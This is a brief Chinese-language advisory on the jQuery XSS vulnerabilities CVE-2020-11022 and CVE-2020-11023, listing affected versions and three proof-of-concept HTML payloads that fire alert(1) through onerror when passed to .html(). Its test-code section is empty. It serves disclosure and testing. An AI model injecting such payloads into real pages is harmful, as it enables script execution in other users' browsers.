JQuery XSS漏洞(CVE-2020-11022/11023)

该漏洞源于WEB应用缺少对客户端数据的正确验证。

影响版本：

 1.2.0 <= jquery < V 3.5.0

测试代码：

    
    
    





jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)
PoCs of XSS bugs fixed in jQuery 3.5.0. You can find the details in my blog post: English / 日本語

PoC 1
Assign to innerHTML Append via .html()

<style><style /><img src=x onerror=alert(1)> 


PoC 2 (Only jQuery 3.x affected)
Assign to innerHTML Append via .html()

<img alt="<x" title="/><img src=x onerror=alert(1)>">


PoC 3
Assign to innerHTML Append via .html()

<option><style></option></select><img src=x onerror=alert(1)></style>